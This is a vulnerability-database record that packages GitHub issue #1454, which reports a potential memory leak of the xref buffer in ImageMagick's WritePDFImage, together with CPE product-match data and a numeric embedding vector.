[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "E982CE9C-89F7-4A5D-B036-A9A483493D5B", "versionEndExcluding": "6.9.10-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "2F7DF2A1-ADDE-48C4-BD39-CCA15D0D767A", "versionEndExcluding": "7.0.8-25", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0-0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:graphicsmagick:graphicsmagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA564A9F-4001-4846-A8BB-EAD95674C890", "versionEndExcluding": null, "versionEndIncluding": "1.3.31", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1454
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> Potential memory leak in function WritePDFImage in coders/pdf.c, which is similar to but different from #576. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> **xref** is allocated at line [L1362](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362) or reallocated at line [L1499](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1499). ```c 1362: xref=(MagickOffsetType *) AcquireQuantumMemory(2048UL,sizeof(*xref)); 1499: xref=(MagickOffsetType *) ResizeQuantumMemory(xref,(size_t) count+2048UL, sizeof(*xref)); ``` However, when the function returns with *MagickFalse* (such as [L1902](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1902) and [L1912](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1912)), **xref** was neither passed outside to the caller function nor freed. I believe the two positions needs to free **xref** because **xref** is freed at the **default case** at [L1931](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1931) while the 2 positions locates in another 2 cases of a switch statement. So memory leak can happen at line **1902** and **1912**. There are many similar positions including [L1965](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1965), [L2011](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2011), [L2021](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2021), [L2082](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2082), [L2179](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2179), [L2427](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362), [L2437](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2437), [L2488](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2488), [L2529](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2529), [L2539](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2539), [L2594](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2594), [L2682](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2682) and [L2894](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2894). ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 + VS Code - Additional information: code review <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu of VARAS of IIE
Potential Memory Leak in WritePDFImage in coders/pdf.c different from #576
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1454/comments
2
2019-01-17T11:10:56
2019-02-12T01:46:36Z
https://github.com/ImageMagick/ImageMagick/issues/1454
400,226,040
1,454
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Potential Memory Leak in WritePDFImage in coders/pdf.c different from #576 Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> Potential memory leak in function WritePDFImage in coders/pdf.c, which is similar to but different from #576. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> **xref** is allocated at line [L1362](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362) or reallocated at line [L1499](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1499). ```c 1362: xref=(MagickOffsetType *) AcquireQuantumMemory(2048UL,sizeof(*xref)); 1499: xref=(MagickOffsetType *) ResizeQuantumMemory(xref,(size_t) count+2048UL, sizeof(*xref)); ``` However, when the function returns with *MagickFalse* (such as [L1902](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1902) and [L1912](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1912)), **xref** was neither passed outside to the caller function nor freed. I believe the two positions needs to free **xref** because **xref** is freed at the **default case** at [L1931](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1931) while the 2 positions locates in another 2 cases of a switch statement. So memory leak can happen at line **1902** and **1912**. There are many similar positions including [L1965](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1965), [L2011](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2011), [L2021](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2021), [L2082](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2082), [L2179](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2179), [L2427](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L1362), [L2437](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2437), [L2488](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2488), [L2529](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2529), [L2539](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2539), [L2594](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2594), [L2682](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2682) and [L2894](https://github.com/ImageMagick/ImageMagick/blob/master/coders/pdf.c#L2894). ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick-4f0ea40e2a090e245f31d1f05247520d6e7eb4ca - Environment (Operating system, version and so on): Ubuntu 16.04 + VS Code - Additional information: code review <!-- Thanks for reporting the issue to ImageMagick! --> Credit to Bingchang Liu of VARAS of IIE --- end body ---
3,535
[ -0.03568752110004425, 0.02348451130092144, -0.007944522425532341, 0.03482186421751976, 0.016056591644883156, 0.03169431909918785, -0.016922252252697945, 0.02521583065390587, -0.03847997263073921, 0.03979242593050003, 0.017424892634153366, 0.00671235378831625, 0.010806784965097904, 0.010646219365298748, 0.022004513069987297, 0.0031764127779752016, -0.003975751809775829, 0.009229050017893314, -0.025132058188319206, -0.03739091753959656, -0.0083633903414011, -0.009696785360574722, -0.008621691726148129, 0.007756032515317202, -0.015903007239103317, 0.014395084232091904, -0.010646219365298748, -0.016866402700543404, 0.018430175259709358, -0.011393199674785137, 0.049035437405109406, 0.029041489586234093, -0.009878294542431831, 0.01586112007498741, 0.0028500452172011137, -0.014939611777663231, 0.04336676374077797, 0.04959392920136452, 0.023554323241114616, 0.015484140254557133, 0.012356595136225224, -0.04844902083277702, -0.02985130064189434, -0.0047401855699718, 0.0006086670327931643, -0.01991017535328865, -0.00815395638346672, -0.017006026580929756, -0.03484978526830673, 0.020077722147107124, 0.018597722053527832, -0.0233309268951416, -0.012112255208194256, -0.03200148791074753, 0.01717357337474823, -0.0010524048702791333, 0.04470713809132576, 0.04962185025215149, 0.02006375975906849, 0.01806715689599514, 0.004907732363790274, 0.0501803420484066, 0.04149581864476204, 0.003260186407715082, 0.005665184929966927, 0.0003172049764543772, -0.03074488416314125, -0.0015541734173893929, -0.010276218876242638, 0.005487165879458189, -0.011435085907578468, -0.004349242430180311, 0.035966768860816956, 0.05601656436920166, 0.008579805493354797, 0.00562678836286068, 0.060707882046699524, 0.030046772211790085, -0.01184697262942791, 0.02898564003407955, -0.04208223521709442, 0.022953946143388748, -0.013592254370450974, 0.03214110806584358, 0.019086401909589767, 0.0012356594670563936, -0.03660903126001358, -0.060372788459062576, -0.0012792915804311633, -0.005340562202036381, 0.011463010683655739, 0.017955459654331207, 0.016238102689385414, -0.05135317146778107, 0.004513298626989126, -0.022926021367311478, -0.027212433516979218, -0.02482488751411438, -0.04065808653831482, -0.02458753064274788, -0.00903357844799757, -0.033649034798145294, -0.02253507822751999, 0.039987895637750626, 0.011442067101597786, 0.0010733483359217644, -0.003825657768175006, -0.054871659725904465, 0.007441881578415632, 0.13269726932048798, 0.014618480578064919, 0.011009237729012966, -0.052190907299518585, 0.02411281317472458, 0.006202731281518936, 0.014206593856215477, 0.012328670360147953, -0.029879223555326462, -0.025048283860087395, -0.006150373257696629, -0.010904520750045776, -0.028538847342133522, 0.00962697435170412, -0.000633973628282547, -0.02030111849308014, 0.03342563658952713, 0.01845810003578663, -0.035436201840639114, -0.005392920691519976, -0.0062341466546058655, -0.01595885679125786, -0.03462639078497887, 0.01187489740550518, -0.01399017870426178, -0.004614525008946657, -0.006632070988416672, -0.0009633955778554082, 0.05001279339194298, -0.008384333923459053, -0.005518581252545118, -0.037670161575078964, -0.048616569489240646, 0.037726011127233505, 0.006111976690590382, 0.005682637449353933, -0.005351033993065357, -0.025886019691824913, 0.017634326592087746, 0.005926976911723614, 0.01866753399372101, -0.003623205004259944, -0.0275614894926548, 0.009948106482625008, 0.0007050938438624144, 0.03032601624727249, -0.017522629350423813, 0.029627904295921326, 0.037223368883132935, -0.012049425393342972, -0.022004513069987297, -0.04060223698616028, -0.039094313979148865, 0.03211318328976631, 0.01869545876979828, -0.003989714197814465, -0.027868660166859627, 0.012670746073126793, 0.025523001328110695, -0.02277243696153164, 0.019896212965250015, -0.0018255647737532854, 0.0017513902857899666, 0.004289902746677399, -0.03381657972931862, -0.03711167350411415, 0.0037872614338994026, 0.007434900384396315, 0.010436785407364368, -0.0012984896311536431, -0.05029204115271568, 0.02280036173760891, -0.015121121890842915, -0.024266397580504417, 0.013403763994574547, 0.023289039731025696, -0.01651734672486782, 0.017438855022192, 0.0005602354649454355, -0.007895654998719692, -0.012196029536426067, -0.029236961156129837, -0.0014477112563326955, 0.03426337242126465, -0.003871035063639283, 0.05780373141169548, 0.024070926010608673, -0.012915085069835186, -0.023763757199048996, 0.005762920714914799, -0.020161494612693787, 0.02027319371700287, -0.008859050460159779, -0.024252435192465782, 0.004467921331524849, -0.0042235818691551685, 0.004858864471316338, -0.017131686210632324, 0.004862355068325996, 0.0028203753754496574, -0.03239243105053902, -0.011267539113759995, 0.00287971505895257, 0.03267167508602142, 0.018290553241968155, -0.01468829158693552, 0.010115653276443481, -0.03024224378168583, 0.009815464727580547, -0.001209480338729918, -0.00008720954792806879, 0.02488073706626892, -0.027421867474913597, 0.012559047900140285, -0.011344331316649914, -0.017578478902578354, -0.02622111327946186, 0.008775277063250542, 0.0032078279182314873, -0.03515695780515671, -0.0026057057548314333, 0.03211318328976631, -0.0221441350877285, -0.014758102595806122, -0.0046075438149273396, -0.00744886277243495, -0.014059989713132381, -0.032783374190330505, -0.014744140207767487, -0.024894699454307556, -0.0012862726580351591, 0.025830170139670372, 0.03666488081216812, -0.00017038313671946526, -0.010094709694385529, 0.021809041500091553, 0.03968072682619095, -0.030828658491373062, -0.005197449121624231, 0.0005292567075230181, 0.030912430956959724, 0.03512903302907944, -0.014799989759922028, 0.0027523094322532415, -0.006928768940269947, -0.007047447841614485, -0.012768481858074665, 0.013899424113333225, 0.024392059072852135, -0.038200728595256805, -0.03987620025873184, 0.02479696460068226, 0.017452817410230637, -0.040825631469488144, 0.025648660957813263, 0.0160147063434124, -0.010646219365298748, -0.006628580391407013, 0.025606773793697357, -0.0069322590716183186, -0.010199426673352718, 0.015623762272298336, -0.04026714339852333, 0.000635282602161169, -0.018918855115771294, -0.02708677388727665, 0.004296883940696716, -0.02708677388727665, -0.006188769359141588, -0.014618480578064919, -0.015889044851064682, -0.005152071826159954, 0.01042980421334505, -0.027156583964824677, 0.0388709157705307, 0.03077280893921852, -0.01690828986465931, 0.031079977750778198, 0.0017217204440385103, -0.0407697819173336, 0.0064854673109948635, -0.024810925126075745, -0.011009237729012966, -0.0014712725533172488, -0.024992436170578003, 0.010785841383039951, -0.02830149047076702, -0.015442253090441227, -0.00857282429933548, -0.025788282975554466, -0.018709421157836914, -0.033146392554044724, -0.00051442178664729, -0.02253507822751999, 0.010890558362007141, -0.005902543198317289, 0.008056220598518848, -0.03831242769956589, 0.04244525358080864, 0.03616223856806755, -0.0414399690926075, 0.033202242106199265, -0.06283014267683029, 0.020021872594952583, -0.028078094124794006, -0.009152257815003395, -0.00938961561769247, 0.002401507692411542, -0.0233309268951416, 0.0148977255448699, -0.0044749025255441666, -0.011316407471895218, 0.009962068870663643, -0.00520093971863389, 0.016405649483203888, 0.024964511394500732, -0.026891302317380905, -0.012538104318082333, 0.06160146743059158, -0.032252807170152664, 0.019309798255562782, 0.0036301861982792616, -0.02479696460068226, -0.008558861911296844, -0.012796405702829361, 0.0363018624484539, -0.026919227093458176, -0.05319618806242943, 0.04113280028104782, 0.017243383452296257, 0.01447885762900114, -0.04465128853917122, -0.013669046573340893, -0.005138109438121319, -0.03610638901591301, 0.05182788893580437, -0.02672375552356243, -0.012656783685088158, 0.007476787082850933, 0.015847159549593925, -0.025969794020056725, 0.0009276172495447099, 0.037781860679388046, 0.012552066706120968, 0.025760360062122345, 0.0006213203305378556, 0.03211318328976631, -0.02514602057635784, 0.014534707181155682, 0.01586112007498741, 0.000018720873413258232, 0.0022706117015331984, -0.048141852021217346, -0.0137807447463274, 0.011909803375601768, 0.009529238566756248, 0.02624903805553913, -0.004830940160900354, 0.012789425440132618, -0.023121492937207222, 0.013522443361580372, -0.025732435286045074, 0.052162982523441315, -0.025676585733890533, 0.012894141487777233, 0.0003686907875817269, -0.015135083347558975, 0.03398412838578224, 0.028329413384199142, -0.036832425743341446, 0.02185092866420746, -0.009976030327379704, 0.025592811405658722, 0.045405250042676926, -0.02672375552356243, 0.009773578494787216, 0.013299047015607357, -0.028231678530573845, 0.038228653371334076, 0.014702253974974155, -0.05043166130781174, -0.0614897683262825, 0.026235075667500496, -0.01352942455559969, -0.04345053434371948, 0.006897353567183018, 0.08042258769273758, 0.018346402794122696, -0.018053194507956505, 0.026290925219655037, -0.057189393788576126, 0.01937960833311081, -0.048588644713163376, 0.02663998119533062, 0.013019802048802376, 0.01979847624897957, 0.05233053117990494, 0.049510154873132706, -0.015889044851064682, 0.023344889283180237, -0.012810368090867996, 0.0262769628316164, 0.010066785849630833, -0.029990922659635544, 0.03800525516271591, 0.02387545444071293, 0.038647521287202835, -0.0026510830502957106, 0.03373280540108681, 0.002696460345759988, 0.017871685326099396, 0.010422823019325733, -0.0073371645994484425, -0.011407162062823772, 0.020608287304639816, 0.0003344396245665848, 0.020315080881118774, 0.036832425743341446, 0.006272542756050825, 0.02363809570670128, -0.009606030769646168, -0.03381657972931862, -0.0002264503127662465, -0.008726408705115318, 0.027128661051392555, 0.004520279821008444, -0.020217344164848328, -0.058082979172468185, -0.03242035582661629, -0.017941497266292572, -0.015274706296622753, 0.015875082463026047, 0.055346377193927765, -0.003202592022716999, -0.002361366292461753, 0.0002905894070863724, -0.03621808812022209, -0.02973960153758526, 0.007560560945421457, 0.0034888184163719416, -0.012356595136225224, -0.02973960153758526, 0.02229771949350834, -0.029711676761507988, -0.025495076552033424, 0.02514602057635784, -0.000011692024600051809, -0.04342260956764221, -0.025676585733890533, -0.004551694728434086, -0.00678565539419651, 0.005640750750899315, 0.021571682766079903, -0.021027155220508575, -0.013089613057672977, -0.010646219365298748, 0.012810368090867996, -0.0033980635926127434, 0.004855373874306679, 0.020943380892276764, -0.0038116953801363707, 0.023163380101323128, 0.04565657302737236, 0.0005619807634502649, 0.014101876877248287, 0.000027406378649175167, 0.02809205651283264, 0.004729713778942823, -0.005878109019249678, 0.01764828898012638, -0.05953505262732506, 0.007700183428823948, -0.053028643131256104, -0.04149581864476204, 0.0006501174648292363, 0.01595885679125786, 0.02053847536444664, 0.00351150706410408, -0.0016527818515896797, -0.014911687932908535, 0.003989714197814465, 0.006677448283880949, 0.011079048737883568, -0.008768295869231224, -0.026360735297203064, -0.009403578005731106, 0.024810925126075745, -0.02693318948149681, -0.03621808812022209, 0.05520675331354141, -0.015609800815582275, 0.014758102595806122, -0.023149417713284492, 0.03429129719734192, -0.01622414030134678, 0.040015820413827896, -0.034542616456747055, -0.03468224033713341, -0.030018847435712814, -0.02848299965262413, -0.028762243688106537, 0.0025132058653980494, -0.028552809730172157, -0.0055290525779128075, -0.04350638389587402, 0.004160751588642597, -0.042612798511981964, 0.02577432245016098, -0.002851790515705943, 0.029572054743766785, 0.01538640446960926, -0.01586112007498741, -0.015484140254557133, 0.01422753743827343, 0.03739091753959656, 0.00723942881450057, 0.013445651158690453, 0.02398715354502201, 0.008342446759343147, 0.0364973321557045, -0.027184508740901947, 0.0334535613656044, 0.0012758009834215045, 0.006227165460586548, 0.038256578147411346, 0.019603004679083824, 0.001912828884087503, 0.011016218923032284, 0.011958670802414417, -0.020021872594952583, -0.001504432875663042, -0.031778089702129364, 0.013375839218497276, 0.002619667910039425, 0.014534707181155682, -0.022074325010180473, 0.01803923211991787, -0.022939983755350113, 0.03577129542827606, -0.018290553241968155, -0.01824866607785225, -0.011965651996433735, -0.024503756314516068, 0.009215087629854679, 0.006303957663476467, -0.0017758242320269346, 0.010667162016034126, 0.004775091074407101, -0.009340748190879822, 0.024950549006462097, -0.01239848230034113, -0.005605845246464014, 0.01391338650137186, 0.018164893612265587, 0.009955087676644325, -0.02356828562915325, -0.032364506274461746, 0.018081119284033775, 0.010304143652319908, -0.04007166996598244, -0.03398412838578224, 0.006454051937907934, 0.01533055491745472, 0.017187535762786865, -0.010541502386331558, -0.004823958966881037, 0.005288203712552786, 0.017606401816010475, 0.0005048227612860501, -0.008063201792538166, -0.017159610986709595, 0.01556791365146637, -0.02377771958708763, 0.003251459915190935, 0.03878714144229889, 0.011595652438700199, -0.026542246341705322, 0.011895840987563133, -0.0003863617603201419, -0.01917017437517643, -0.025369416922330856, 0.009536219760775566, 0.03624601289629936, -0.003595280461013317, 0.01956111751496792, 0.018416212871670723, -0.015553951263427734, 0.009668861515820026, -0.007742070127278566, 0.015930932015180588, 0.0015463196905329823, -0.009249993599951267, 0.019505269825458527, 0.0262769628316164, -0.039345633238554, -0.0339282788336277, 0.0036022616550326347, 0.024545643478631973, -0.007609428837895393, 0.0016231121262535453, 0.014799989759922028, 0.01732715778052807, -0.00937565416097641, 0.027687150985002518, 0.01685244031250477, 0.028762243688106537, 0.0018028761260211468, 0.02818979136645794, -0.0148977255448699, -0.020426778122782707, 0.004129336681216955, 0.020021872594952583, -0.03147092089056969, -0.0077909380197525024, 0.0034713654313236475, -0.02929280884563923, 0.014101876877248287, -0.01901658996939659, -0.01586112007498741, -0.017006026580929756, -0.012482255697250366, -0.0038396199233829975, 0.012468293309211731, 0.02187885344028473, -0.023135455325245857, -0.03253205120563507, 0.043171290308237076, 0.024894699454307556, -0.01153282169252634, -0.008558861911296844, -0.0015332300681620836, -0.01324319839477539, 0.013333952985703945, 0.0030577336438000202, 0.039094313979148865, -0.022423380985856056, -0.024489793926477432, -0.0036825446877628565, 0.017773950472474098, -0.0009895748225972056, 0.0053964112885296345, -0.03342563658952713, 0.0012208246625959873, 0.00878225825726986, 0.025550926104187965, -0.01151886023581028, -0.004520279821008444, 0.009145276620984077, 0.042221855372190475, 0.004523770418018103, -0.0002046342851826921, 0.013648103922605515, 0.02374979481101036, -0.02892979048192501, 0.013829613104462624, 0.007909617386758327, -0.00945244636386633, -0.023847529664635658, 0.008914899080991745, 0.05115770176053047, 0.01741093210875988, 0.01388546172529459, -0.00790263619273901, 0.017508666962385178, 0.010646219365298748, -0.01412282045930624, -0.009424521587789059, 0.005040373653173447, 0.01184697262942791, -0.03295091912150383, 0.01627998799085617, 0.017006026580929756, -0.04484676197171211, 0.011714331805706024, -0.01890489272773266, -0.015065272338688374, 0.022060362622141838, 0.017313195392489433, -0.006855466868728399, -0.024978473782539368, -0.03479393944144249, 0.027393942698836327, -0.04118864983320236, 0.03027016669511795, -0.007462825160473585, -0.002312498399987817, 0.01241244375705719, 0.0017740789335221052, 0.017718100920319557, -0.02298187091946602, -0.012105274945497513, -0.049538079649209976, 0.02761733904480934, 0.007916598580777645, 0.006056127604097128, -0.030912430956959724, 0.018136968836188316, -0.012356595136225224, -0.014534707181155682, -0.0005384194082580507, 0.013738858513534069, -0.008914899080991745, 0.010702067986130714, -0.035855069756507874, -0.0008787493570707738, 0.008838106878101826, -0.00029386181267909706, 0.004600562620908022, -0.03884299099445343, 0.0009345983853563666, -0.02059432491660118, -0.026989037171006203, -0.018821118399500847, -0.02083168365061283, -0.057161469012498856, 0.016293950378894806, 0.012552066706120968, 0.00027640900225378573, 0.00787471141666174, 0.029460357502102852, 0.014604518190026283, -0.015218857675790787, 0.004572638310492039, -0.012461312115192413, 0.004583110101521015, 0.007309240289032459, 0.01845810003578663, 0.003871035063639283, -0.009689804166555405, 0.02679356560111046, 0.0015026875771582127, 0.00015042147424537688, -0.0021850927732884884, 0.005734995938837528, -0.019337723031640053, 0.019184136763215065, -0.013976216316223145, 0.034402996301651, 0.016084516420960426, -0.016154328361153603, 0.017508666962385178, 0.0027488188352435827, -0.0030350449960678816, 0.022130172699689865, -0.03610638901591301, 0.011560746468603611, -0.006125939078629017, 0.0172014981508255, -0.03736299276351929, 0.021236589178442955, 0.0011588671477511525, -0.022451305761933327, -0.017536591738462448, 0.017578478902578354, 0.004153770860284567, 0.03152677044272423, 0.00422009127214551, 0.02711469866335392, -0.038200728595256805, 0.025285642594099045, 0.0073860324919223785, 0.0006239382200874388, -0.011065086349844933, -0.009654899127781391, -0.01324319839477539, 0.040965255349874496, -0.03672073036432266, 0.004321317654103041, 0.022186022251844406, 0.008356409147381783, 0.017550554126501083, 0.007117259316146374, 0.02976752631366253, -0.04395317658782005, 0.015456215478479862, 0.020468665286898613, -0.004624996799975634, 0.015498102642595768, 0.002207781421020627, -0.04009959474205971, 0.005277731921523809, -0.0068205613642930984, -0.03789355978369713, 0.04976147413253784, -0.016684893518686295, -0.0053265998139977455, -0.03850789740681648, 0.013473575003445148, -0.002155422931537032, -0.030102619901299477, -0.029655829071998596, -0.027812810614705086, 0.03641355782747269, -0.0233309268951416, -0.035017333924770355, -0.038675446063280106, 0.009689804166555405, -0.024001115933060646, 0.028371300548315048, -0.022814324125647545, 0.024056963622570038, 0.015456215478479862, -0.01257301028817892, 0.0019948570989072323, 0.029460357502102852, 0.008852069266140461, -0.008642635308206081, -0.019449420273303986, -0.01699206419289112, -0.014283386059105396, -0.015623762272298336, -0.03484978526830673, -0.002090847585350275, 0.018835080787539482, -0.03672073036432266, -0.028469037264585495, 0.002987922402098775, 0.009843389503657818, -0.0007705418975092471, 0.007110278122127056, 0.04339468479156494, -0.004719241987913847, -0.014967536553740501, 0.027756961062550545, 0.01925394870340824, 0.0061154672876000404, 0.007246410008519888, 0.0019320269348099828, -0.005473203491419554, -0.023163380101323128, 0.019295835867524147, -0.013801688328385353, 0.0021222627256065607, -0.012628858909010887, -0.007047447841614485, 0.0034643844701349735, -0.014423009008169174, -0.022898096591234207, 0.01001791749149561, 0.0028448093216866255, 0.011798105202615261, 0.03462639078497887, 0.019421495497226715, -0.03381657972931862, 0.0075186737813055515, 0.0014328763354569674, -0.01717357337474823, -0.0023316964507102966, 0.010283200070261955, -0.0014782536309212446, 0.0011012727627530694, 0.02377771958708763, -0.004366694949567318, -0.019337723031640053, -0.04060223698616028, 0.04414865002036095, -0.013194330036640167, -0.006670467089861631, 0.002398017095401883, 0.02937658317387104, -0.03395620360970497, 0.004768109880387783, -0.0011073813075199723, 0.04470713809132576, 0.0016649988247081637, -0.003300327807664871, -0.014311310835182667, 0.03169431909918785, -0.00562678836286068, 0.031889788806438446, 0.01445093285292387, -0.03619016334414482, 0.014981498941779137, 0.014939611777663231, 0.012321689166128635, -0.007560560945421457, -0.0506550595164299, -0.0074698058888316154, -0.032727524638175964, -0.024266397580504417, -0.013299047015607357, 0.010771878995001316, 0.007016032934188843, -0.02369394525885582, -0.018262628465890884, -0.0002829538134392351, 0.015372442081570625, 0.011616596020758152, -0.005389430094510317, 0.010213389061391354, -0.011581690050661564, -0.008817163296043873, 0.0010977822821587324, -0.01401810348033905, -0.0039722612127661705, -0.02435017190873623, -0.009759616106748581, 0.038647521287202835, 0.004631977993994951, 0.0034224975388497114, 0.0037558465264737606, 0.002624903805553913, -0.023358851671218872, -0.010674143210053444, -0.037670161575078964, -0.012258859351277351, 0.040881481021642685, -0.018918855115771294, 0.0074698058888316154, -0.03211318328976631, 0.024573568254709244, -0.005721033550798893, 0.026863377541303635, 0.0028692432679235935, 0.010380935855209827, 0.011916783638298512, -0.01622414030134678, -0.014799989759922028, 0.008803200908005238, 0.00554999615997076, 0.015763385221362114, 0.0028151394799351692, 0.00304028089158237, -0.004953109659254551, -0.004429525230079889, 0.018109044060111046, -0.017955459654331207, -0.019281873479485512, 0.017773950472474098, -0.017955459654331207, -0.0072045233100652695, 0.03563167154788971, -0.0015943149337545037, 0.018639609217643738, 0.005864146631211042, -0.0039094313979148865, 0.016656968742609024, 0.021711304783821106, -0.029097337275743484, -0.004439997021108866, 0.005490656476467848, -0.014813952147960663, -0.017006026580929756, -0.00755357975140214, -0.026514321565628052, -0.02818979136645794, 0.030549412593245506, -0.01756451651453972, 0.0027924508322030306, 0.030549412593245506, 0.013354896567761898, 0.005204430315643549, -0.0024730642326176167, -0.0293207336217165, -0.0049426378682255745, 0.004967072047293186, 0.01833244040608406, -0.05643543228507042, -0.007372070103883743, -0.03755846247076988, -0.016168290749192238, -0.0077071646228432655, 0.009131314232945442, 0.040490537881851196, 0.034542616456747055, 0.023596210405230522, 0.05205128341913223, -0.006834523286670446, -0.014011122286319733, -0.011812067590653896, 0.0073371645994484425, 0.003473110729828477, -0.01767621375620365, 0.03247620537877083, -0.005951411090791225, 0.002837828127667308, -0.02256300300359726, 0.012258859351277351, 0.010911501944065094, -0.0043946197256445885, -0.015875082463026047, 0.0033631580881774426, 0.01184697262942791, 0.019351685419678688, -0.040350914001464844, 0.00046555392327718437, 0.0037418841384351254, 0.002928582951426506, -0.018346402794122696, -0.027673188596963882, -0.0014381122309714556, -0.023498473688960075, 0.0026423565577715635, 0.01321527361869812, -0.02595583163201809, -0.02779884822666645, 0.007804900407791138, 0.010869614779949188, 0.010010936297476292, -0.0027523094322532415, 0.013585273176431656, 0.0011065086582675576, -0.011030181311070919, 